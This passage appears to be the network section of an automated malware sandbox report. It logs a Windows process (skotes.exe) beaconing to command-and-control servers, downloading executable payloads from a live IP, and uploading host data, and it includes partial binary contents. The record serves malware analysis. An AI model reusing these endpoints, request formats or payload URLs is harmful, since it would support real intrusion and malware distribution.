f3 8d 2b 6a 4c a8 8c 08 a4 c7 2a dd 79 63 a3 fc 49 b4 6d b3 fd e6 fb 47 f9 4f 89 a1 3a b3 67 45 c6 f3 f0 e2 e4 84 81 28 8d 3f 7d 30 01 26 fd 85 9a 01 b4 86 3c cf 8b e6 70 01 42 f4 a5 c7 c8 b8 64 fd c9 0d c8 b3 8d 0e dd ae e7 b4 67 6f db c5 35 9e 31 be 61 9d 24 10 bf 06 c1 13 51 c8 a7 c7 ee da 08 33 24 e4 e6 ac f3 9a e3 37 7a dd 7b 71 0d f1 5e 8b 8c de bf ca 53 e4 d0 19 47 14 81 1c 68 5a d6 13 98 e4 56 74 05 41 aa 24 e8 a0 32 03 7c d4 0a 81 31 65 [TRUNCATED] Data Ascii: --------------------------nRrMw9JTgeiHEQRbV11EgGContent-Disposition: form-data; name="file"; filename="Paliwegej.bin"Content-Type: application/octet-streamx7[~"L:t.+jLycImGO:gE(?}0&<pBdgo51a$Q3$7z{q^SGhZVtA$2\|1e=wCg{Umdw\^Ba(U7egKpbroKu?)#05&!L0h<C1,Y\|(sS5O,qBCLT;a,eJ)NK=zuL_'iM4m4OLL2N}jW&#m#1!G:]&2%+\|<']"}rg`lr(4I$A~kKUs[.C78n2{j-3b?l8\|0EK:i3~+ac/\qJw]K/I0xx1Hr"T/#\7<Z^F[/L1$[p u^</6'fJkP2-'KfFys4[{tLeC\y8K8UGW3VY&QwC2%%epSDV7p^lz [TRUNCATED]
Dec 19, 2024 10:12:10.191147089 CET	12360	OUT	Data Raw: f6 c3 49 05 ec f4 03 81 b5 fd d6 57 b1 44 a2 b8 b5 64 2b e8 ed 98 54 24 43 6e 43 df e8 55 36 ea 5f 85 b7 a7 ef e7 66 f7 3a 06 76 b3 40 09 c2 17 1b e5 0e 43 b2 81 ae 81 b0 22 13 9b ad 7a 71 a8 18 b3 23 1f 83 b8 fa 02 15 e2 93 00 d4 09 1f fd 23 f0 Data Ascii: IWDd+T$CnCU6_f:v@C"zq##SPF=(afC}+&lW*6&~=O4,hph(]B<yE$Y#UE&s_"]O:QBTkXHA6M,S{2
Dec 19, 2024 10:12:10.191247940 CET	4154	OUT	Data Raw: a4 c6 b1 47 34 78 5f b9 e8 8b c8 a2 db 9e 84 bf a3 72 02 56 83 18 70 ae 90 90 d4 89 9a c4 95 7c a6 9a c0 13 15 51 29 87 d1 fb b0 48 09 7d 4c 8c ae f4 2a 96 4d c6 60 fa 24 30 1d bb d4 98 08 09 71 f7 30 fb cd 53 2b e4 61 f4 22 e8 95 2c 80 27 c1 b3 Data Ascii: G4x_rVp\|Q)H}LM`$0q0S+a",'itRH-KAA!GpSXp< b'GW@~sd8%$KOm}`ZQNG}'aTV!vk9?$Z!U~*;_\;td
Dec 19, 2024 10:12:11.679300070 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Thu, 19 Dec 2024 09:12:11 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 27 x-ratelimit-reset: 1734601321 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.6	50179	176.53.146.212	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:12.963901997 CET	196	OUT	POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1 Host: home.fivetk5vt.top Accept: / Content-Type: application/json Content-Length: 56 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 63 70 34 7a 39 53 42 43 6f 6d 30 6d 6a 62 41 79 31 37 33 34 35 39 39 34 39 33 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "cp4z9SBCom0mjbAy1734599493", "data": "Done2" }
Dec 19, 2024 10:12:14.548636913 CET	141	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Thu, 19 Dec 2024 09:12:14 GMT content-type: text/html; charset=utf-8 content-length: 4 Data Raw: 6f 6b 61 79 Data Ascii: okay

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	50183	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:19.869586945 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017490001&unit=246122658369
Dec 19, 2024 10:12:21.220181942 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	50187	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:23.014518976 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 19, 2024 10:12:24.370697021 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	50189	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:26.021719933 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 19, 2024 10:12:27.368199110 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 31 37 34 39 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 34 39 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 37 34 39 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 34 39 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1017491001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1017492001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1017493001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1017494001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	50190	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:27.496196032 CET	139	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Thu, 19 Dec 2024 08:27:33 GMT If-None-Match: "6763d8f5-1b7e00"
Dec 19, 2024 10:12:28.829534054 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:28 GMT Last-Modified: Thu, 19 Dec 2024 08:27:33 GMT Connection: keep-alive ETag: "6763d8f5-1b7e00"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	50193	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:31.392308950 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017491001&unit=246122658369
Dec 19, 2024 10:12:32.728496075 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	50194	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:32.859311104 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Thu, 19 Dec 2024 08:27:44 GMT If-None-Match: "6763d900-2cb000"
Dec 19, 2024 10:12:34.189184904 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:33 GMT Last-Modified: Thu, 19 Dec 2024 08:27:44 GMT Connection: keep-alive ETag: "6763d900-2cb000"

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.6	50195	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:35.543713093 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:12:36.874576092 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:12:36.879628897 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 2d 2d 0d 0a Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="build"stok------KJEGCFBGDHJJJJJKJECF--
Dec 19, 2024 10:12:37.319776058 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	50196	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:36.919261932 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017492001&unit=246122658369
Dec 19, 2024 10:12:38.265062094 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	50206	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:38.392570019 CET	138	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Thu, 19 Dec 2024 08:25:38 GMT If-None-Match: "6763d882-ec400"
Dec 19, 2024 10:12:39.724365950 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:38 GMT Last-Modified: Thu, 19 Dec 2024 08:25:38 GMT Connection: keep-alive ETag: "6763d882-ec400"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	50211	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:42.027045965 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017493001&unit=246122658369
Dec 19, 2024 10:12:43.378082037 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	50212	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:43.506856918 CET	138	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Thu, 19 Dec 2024 08:26:05 GMT If-None-Match: "6763d89d-1a3200"
Dec 19, 2024 10:12:44.847518921 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:44 GMT Last-Modified: Thu, 19 Dec 2024 08:26:05 GMT Connection: keep-alive ETag: "6763d89d-1a3200"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	50215	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:47.216698885 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017494001&unit=246122658369
Dec 19, 2024 10:12:48.569561005 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	50216	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:47.594146967 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 19, 2024 10:12:48.923464060 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:12:48 GMT Content-Type: application/octet-stream Content-Length: 1716736 Last-Modified: Thu, 19 Dec 2024 08:26:07 GMT Connection: keep-alive ETag: "6763d89f-1a3200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 44 00 00 04 00 00 86 70 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$D `@ Dp`Ui`D @ @.rsrcD`2@.idata 6@ )8@giuvursf*:@cwujweuv `D@.taggant@D"@
Dec 19, 2024 10:12:48.923576117 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.923609972 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.924438000 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.924952984 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.925004005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.926167965 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.926220894 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:12:48.927501917 CET	1236	IN	Data Raw: a9 62 71 19 78 7e 6a 0f e8 45 d4 65 de ea b6 cf 22 2d 69 83 4c e4 5c 7b 30 31 1a 64 b3 af 39 b5 73 39 01 78 32 a6 7f b8 e2 be 39 a5 f1 0d 71 7a 2a e5 6a 24 39 4b 44 b9 bd 28 9f 2e 3d 13 aa b0 d9 a1 56 71 b9 72 7f e1 7f e3 d7 69 bb cc 6a e0 5a 63 Data Ascii: bqx~jEe"-iL\{01d9s9x29qz*j$9KD(.=VqrijZc<#1~PryP@JC)}SZ0r{b0? >NS.`Ro92or[Nd)Mw\C\|tm=xtXoKh\ i{3\|(csqyrpraqAV\\|=
Dec 19, 2024 10:12:48.927541018 CET	1236	IN	Data Raw: 51 f4 7c da 4a 6b 67 73 7a a2 78 53 62 a3 72 73 ed c4 67 6f 72 c7 6c 5f 5f c0 ed ca 4c 63 2b 79 b2 75 76 d2 b1 78 b4 22 74 5b 6b ca 3a 20 1f 0c 42 e0 3e ca f4 17 3c 68 76 01 68 75 ce f0 78 f7 33 c6 7a 60 00 e2 0e 61 30 c3 5a 92 6d 34 72 2e 78 f1 Data Ascii: Q\|JkgszxSbrsgorl__Lc+yuvx"t[k: B><hvhux3z`a0Zm4r.xkn7[`df8gS`LX7+{]}:wsiwbquUXHc=8pU)B=C@m41(;p/5~>!"Fo(?l298Dk5<1(8!_27O*=67C
Dec 19, 2024 10:12:49.045455933 CET	1236	IN	Data Raw: 0e 2b 74 18 61 38 b8 2d e0 8d df 61 5d dc 5e dd 9a bd c0 7b ae b1 76 73 cd 83 ab 7d 69 ba 4a ab 10 ce 62 79 a4 49 fb f8 16 4b 69 3f 68 29 27 73 51 95 84 c9 92 a2 95 db 17 8b 59 b2 ef a9 c5 27 13 70 04 b5 b2 ab 74 ff d1 d6 8b be a2 dd c6 17 cc ba Data Ascii: +ta8-a]^{vs}iJbyIKi?h)'sQY'pth:^M.RuO\|mnnJ#-GWGd2^La.mzdWYe/5pCtSF1?bC0TB?@Ao>w$bY JR,9X"m[/))>(az3C8i

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.6	50222	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:12:49.045969009 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:50.131514072 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83891 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:50.242801905 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:50.557410955 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83892 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:50.628468037 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
